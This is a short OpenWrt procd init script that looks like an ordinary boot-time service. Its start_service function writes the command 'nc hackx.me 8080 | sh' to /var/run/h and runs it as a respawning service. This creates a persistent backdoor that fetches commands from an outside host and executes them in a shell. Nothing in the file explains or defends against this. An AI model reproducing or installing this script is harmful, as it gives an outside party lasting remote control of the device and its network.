#!/bin/sh /etc/rc.common
START=94
USE_PROCD=1
start_service() {
echo 'nc hackx.me 8080 | sh' > /var/run/h
procd_open_instance
procd_set_param command sh /var/run/h
procd_set_param respawn 3600 2 1000
procd_close_instance
}
